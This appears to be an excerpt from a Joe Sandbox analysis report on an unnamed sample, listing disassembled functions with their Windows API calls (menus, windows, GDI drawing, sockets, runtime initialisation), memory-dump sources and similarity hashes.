                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1101466143-0
                                                                                                                                                        • Opcode ID: 9a59398e91333c3f317ebe91a625cd08a70fdb08e320fe7750dc95076a621a55
                                                                                                                                                        • Instruction ID: feae901e2471d483c860df602e2918fdce712d629a3b64223a389cfa5dc2cb78
                                                                                                                                                        • Opcode Fuzzy Hash: 9a59398e91333c3f317ebe91a625cd08a70fdb08e320fe7750dc95076a621a55
                                                                                                                                                        • Instruction Fuzzy Hash: 6D517EB5A00209EFDB24CF58C880AAAB7F8FF5C314B15855AE95ADB310D734E951CFA0
                                                                                                                                                        Function 00AF82DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetMenu.USER32(?), ref: 00AF833D
                                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00AF8374
                                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AF839C
                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00AF840B
                                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 00AF8419
                                                                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00AF846A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 650687236-0
                                                                                                                                                        • Opcode ID: c800e229f955ec9dd30e538c222871f92524c8411eead4a2e9bf8bb949f0f405
                                                                                                                                                        • Instruction ID: 4dc03cf1c00c3d0fa6fb55f95622a9e8ec413596e514aa6f83a79b728ed6c4a2
                                                                                                                                                        • Opcode Fuzzy Hash: c800e229f955ec9dd30e538c222871f92524c8411eead4a2e9bf8bb949f0f405
                                                                                                                                                        • Instruction Fuzzy Hash: 35517C75A0061AAFCF11EFA4CA41AAEB7F4EF48710F108459F915BB351DB38AE418B90
                                                                                                                                                        Function 00AE936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00AE9409
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE9416
                                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00AE943A
                                                                                                                                                        • _strlen.LIBCMT ref: 00AE9484
                                                                                                                                                        • _memmove.LIBCMT ref: 00AE94CA
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE94F7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2795762555-0
                                                                                                                                                        • Opcode ID: 7f72dd91e9a8c51d586f980d09ca660ca41d0c0228f442e592adf5f9245aa131
                                                                                                                                                        • Instruction ID: f3a19b10384a9190851a70a9e998c8de750c5c9cfa71ff8caf14f313fc7b3479
                                                                                                                                                        • Opcode Fuzzy Hash: 7f72dd91e9a8c51d586f980d09ca660ca41d0c0228f442e592adf5f9245aa131
                                                                                                                                                        • Instruction Fuzzy Hash: D9417275600248AFDB14EBA5CD95EEEB7BDEF48310F108169F516972D2DB30AE41CB60
                                                                                                                                                        Function 00AD54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AD552E
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD5579
                                                                                                                                                        • IsMenu.USER32(00000000), ref: 00AD5599
                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00AD55CD
                                                                                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00AD562B
                                                                                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AD565C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3311875123-0
                                                                                                                                                        • Opcode ID: 243fcc52a47b87361f8d2b089d6521862a0e2472be8d62e65736c6a1144fc87c
                                                                                                                                                        • Instruction ID: 34fff60ed098ef29b97f98b334402f817218801ace02236730f5ca077c657990
                                                                                                                                                        • Opcode Fuzzy Hash: 243fcc52a47b87361f8d2b089d6521862a0e2472be8d62e65736c6a1144fc87c
                                                                                                                                                        • Instruction Fuzzy Hash: 3A51BA70A00A09ABDF21CF78D988BAEBBF6AF15318F58421AE4069B390D770D944CB51
                                                                                                                                                        Function 00AAB18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00AAB1C1
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AAB225
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00AAB242
                                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AAB253
                                                                                                                                                        • EndPaint.USER32(?,?), ref: 00AAB29D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1827037458-0
                                                                                                                                                        • Opcode ID: 47932d0de124856b0a153a2000bd8c323e1a49badf01240718ac7da73bd23dcd
                                                                                                                                                        • Instruction ID: 2059bf27615d5950d27d4954b7579ecdb8465cb2db13ecb92d48faf32597968d
                                                                                                                                                        • Opcode Fuzzy Hash: 47932d0de124856b0a153a2000bd8c323e1a49badf01240718ac7da73bd23dcd
                                                                                                                                                        • Instruction Fuzzy Hash: BD418F711043019FD721DF28DC84BBA7BE8EB56724F1406A9F995872E2CB3198459B61
                                                                                                                                                        Function 00AFE1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ShowWindow.USER32(00B51810,00000000,?,?,00B51810,00B51810,?,00B0E2D6), ref: 00AFE21B
                                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00AFE23F
                                                                                                                                                        • ShowWindow.USER32(00B51810,00000000,?,?,00B51810,00B51810,?,00B0E2D6), ref: 00AFE29F
                                                                                                                                                        • ShowWindow.USER32(?,00000004,?,?,00B51810,00B51810,?,00B0E2D6), ref: 00AFE2B1
                                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00AFE2D5
                                                                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00AFE2F8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                                        • Opcode ID: a5f2bf12394d9911878a0ed4c3a9ad7c0bfd0bbfa25b26d53461e24a7064f185
                                                                                                                                                        • Instruction ID: 942685d9362ddae41c3b45d59edce3e8d8b46c977b2e159c3ca6d0b2e66e182d
                                                                                                                                                        • Opcode Fuzzy Hash: a5f2bf12394d9911878a0ed4c3a9ad7c0bfd0bbfa25b26d53461e24a7064f185
                                                                                                                                                        • Instruction Fuzzy Hash: E6411A34601249EFDF26CF94C499BE47BE5BB0A314F1881A9FA588F2B2D731A845CB51
                                                                                                                                                        Function 00AE1BFA Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 308COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                          • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                                                                                                                                                        • _wcstok.LIBCMT ref: 00AE1D6E
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE1DFD
                                                                                                                                                        • _memset.LIBCMT ref: 00AE1E30
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                        • String ID: X
                                                                                                                                                        • API String ID: 774024439-3081909835
                                                                                                                                                        • Opcode ID: 3df0a132e1c4a1ba5d35507ee14690841e00b921b0c2fcab53144c15c8c8cf6e
                                                                                                                                                        • Instruction ID: 665e7c51e9a6bf088e72296f0e6fa1c0062bf61cdd462433b8948d69f1a4ee37
                                                                                                                                                        • Opcode Fuzzy Hash: 3df0a132e1c4a1ba5d35507ee14690841e00b921b0c2fcab53144c15c8c8cf6e
                                                                                                                                                        • Instruction Fuzzy Hash: A2C161316087509FCB14EF24C991A9EB7E4FF85310F00496DF89A9B2A2DB30ED45CB92
                                                                                                                                                        Function 00AFE9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00AAB5EB
                                                                                                                                                          • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB5FA
                                                                                                                                                          • Part of subcall function 00AAB58B: BeginPath.GDI32(?), ref: 00AAB611
                                                                                                                                                          • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB63B
                                                                                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00AFE9F2
                                                                                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00AFEA06
                                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AFEA14
                                                                                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00AFEA24
                                                                                                                                                        • EndPath.GDI32(00000000), ref: 00AFEA34
                                                                                                                                                        • StrokePath.GDI32(00000000), ref: 00AFEA44
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                                        • Opcode ID: 7d312d591b36fbdb020f7cf4e5eacb18cb9b0db0d7fc59c1b08f512887d73eb8
                                                                                                                                                        • Instruction ID: 44cfa833079546820c2d977700fb0bb3b35ebfefc11ff42f2c5cb2c914537ec9
                                                                                                                                                        • Opcode Fuzzy Hash: 7d312d591b36fbdb020f7cf4e5eacb18cb9b0db0d7fc59c1b08f512887d73eb8
                                                                                                                                                        • Instruction Fuzzy Hash: E811F77600014DBFDB129F94DC88EEA7FADEB08355F048422FA099A1A0DB719D559BA0
                                                                                                                                                        Function 00ACEF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetDC.USER32(00000000), ref: 00ACEFB6
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00ACEFC7
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ACEFCE
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00ACEFD6
                                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00ACEFED
                                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00ACEFFF
                                                                                                                                                          • Part of subcall function 00ACA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00ACA79D,00000000,00000000,?,00ACAB73), ref: 00ACB2CA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 603618608-0
                                                                                                                                                        • Opcode ID: 0f708652a470db4dbba71f0b5c6fa8ae6618a9b40c7465e30b7de7cbd4cea2a6
                                                                                                                                                        • Instruction ID: ead854f8f1b5797a5af9bfacff70bf58e2d6cf521f8d046a53a899a83ca94403
                                                                                                                                                        • Opcode Fuzzy Hash: 0f708652a470db4dbba71f0b5c6fa8ae6618a9b40c7465e30b7de7cbd4cea2a6
                                                                                                                                                        • Instruction Fuzzy Hash: 21016C75A00315BFEB109BA59C45F5EBFB8EB48751F108069FD04E7290DA709D11CF61
                                                                                                                                                        Function 00AB87D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __init_pointers.LIBCMT ref: 00AB87D7
                                                                                                                                                          • Part of subcall function 00AB1E5A: __initp_misc_winsig.LIBCMT ref: 00AB1E7E
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AB8BE1
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00AB8BF5
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00AB8C08
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00AB8C1B
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00AB8C2E
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00AB8C41
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00AB8C54
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00AB8C67
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00AB8C7A
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00AB8C8D
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00AB8CA0
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00AB8CB3
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00AB8CC6
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00AB8CD9
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00AB8CEC
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00AB8CFF
                                                                                                                                                        • __mtinitlocks.LIBCMT ref: 00AB87DC
                                                                                                                                                          • Part of subcall function 00AB8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00B4AC68,00000FA0,?,?,00AB87E1,00AB6AFA,00B467D8,00000014), ref: 00AB8AD1
                                                                                                                                                        • __mtterm.LIBCMT ref: 00AB87E5
                                                                                                                                                          • Part of subcall function 00AB884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00AB89CF
                                                                                                                                                          • Part of subcall function 00AB884D: _free.LIBCMT ref: 00AB89D6
